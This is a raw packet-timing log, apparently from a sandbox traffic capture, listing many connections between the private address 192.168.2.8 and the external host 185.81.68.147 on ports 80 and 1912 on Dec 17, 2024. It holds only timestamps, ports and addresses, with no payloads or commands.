                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281308889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281317949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281918049 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.282124996 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.282192945 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339400053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339499950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339627981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339737892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.339765072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340136051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340687990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340699911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.340934038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.341589928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.341675997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.341953039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.342462063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.342580080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.342880011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.343493938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.343559027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344402075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344472885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344512939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.344634056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.345381021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.345392942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.345519066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.346342087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.346357107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.346546888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.347357035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.347532988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348165989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348319054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348459959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.348642111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.349478960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.349490881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.349749088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.350157022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.350219965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.350370884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.351067066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.351136923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.351948977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.352014065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.352196932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.352363110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.353019953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.353144884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.353995085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354007006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354140043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354955912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.354968071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.355212927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.355962992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.355974913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.356209040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.356836081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.356848001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.357166052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.357768059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.357937098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.358468056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.358660936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.358764887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.359652042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.359698057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.359731913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.360071898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.360626936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.360773087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.360918999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.361601114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.361740112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.362549067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.362560034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.362673044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.363491058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.363507986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.363991976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.364394903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.364579916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.364784002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.365360975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.365519047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.365633011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.366421938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.366556883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.366821051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.367263079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.367916107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.368192911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.368278027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.368290901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.368489981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.369168043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.369287014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.370121956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.370184898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.370389938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.370801926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.371077061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.371170044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.371300936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.372014046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.372134924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.372452974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.373040915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.373095989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.373217106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.373995066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.374006033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.374159098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.374877930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.375271082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.375479937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.375943899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.376339912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.376769066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.376928091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.376946926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.377073050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.377687931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.377926111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.378218889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.378694057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.378868103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.379498005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.379616976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.379843950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.380539894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.380651951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.380675077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.380880117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.381664038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.381675959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.381755114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.382580996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.382591963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.383337975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.383629084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.383641958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.384414911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.384504080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.384978056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.385441065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.385483027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.385484934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.386451960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.386465073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.386482954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.387358904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.387588978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.387619972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.388015985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.388289928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.388361931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.389390945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.389600039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395207882 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395217896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395337105 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395345926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395473003 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395592928 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395690918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395699978 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395881891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395889997 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.395931005 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396027088 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396086931 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396107912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396234035 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396243095 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396349907 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396358013 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396496058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396505117 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396578074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396586895 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396625042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396752119 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396770954 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396779060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396874905 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.396922112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397003889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397012949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397141933 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397250891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397258997 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397308111 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397315979 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397325993 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397458076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397465944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397598982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397680044 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397737026 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397793055 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397944927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.397953987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398252010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398261070 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398386955 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398396015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398498058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398507118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398608923 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398617983 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398838043 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.398847103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.399075031 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.399163961 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.401989937 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.401999950 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402086973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402096033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402139902 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402239084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402256966 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402265072 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402338982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402348042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402455091 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402465105 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402571917 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402580023 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402750015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402759075 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402904034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402913094 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.402920961 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403013945 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403023005 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403121948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403131008 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403204918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403249979 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403278112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403286934 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403340101 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403455973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403465033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403474092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403548002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403557062 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403594017 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403613091 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403676033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403685093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403774023 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403783083 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403848886 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403942108 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403974056 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.403983116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404122114 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404130936 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404139042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404146910 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404191017 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404200077 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404254913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404263973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404280901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404289961 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.404930115 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.405534029 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.405606985 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519119978 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519134998 CET191249710185.81.68.147192.168.2.8
